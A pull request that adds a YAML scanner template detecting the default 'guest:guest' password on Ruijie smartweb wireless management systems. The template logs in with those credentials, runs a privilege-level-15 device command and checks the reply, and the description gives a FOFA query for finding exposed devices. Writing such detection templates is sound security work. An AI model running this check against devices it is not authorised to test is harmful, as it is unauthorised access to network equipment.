### PR TITLE
ruijie-smartweb-default-password

### DIFF
--- a/pocs/ruijie-smartweb-default-password.yml
+++ b/pocs/ruijie-smartweb-default-password.yml
@@ -1,0 +1,14 @@
+name: poc-yaml-ruijie-smartweb-default-password
+rules:
+  - method: POST
+    path: /WEB_VMS/LEVEL15/
+    headers:
+      Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
+    body: command=show basic-info dev&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.
+    follow_redirects: true
+    expression: |
+      response.status == 200 && response.body.bcontains(b"Level was: LEVEL15") && response.body.bcontains(b"/WEB_VMS/LEVEL15/")
+detail:
+  author: B1anda0(https://github.com/B1anda0)
+  links:
+    - https://www.cnvd.org.cn/flaw/show/CNVD-2020-56167


### PR DESCRIPTION


## 本 poc 是检测什么漏洞的
锐捷网络股份有限公司无线smartweb管理系统存在弱口令漏洞
## 测试环境
FOFA：title="无线smartWeb--登录页面"
## 备注
![image](https://user-images.githubusercontent.com/74232513/114528486-a64e6c80-9c7b-11eb-87d9-726fa6d79097.png)
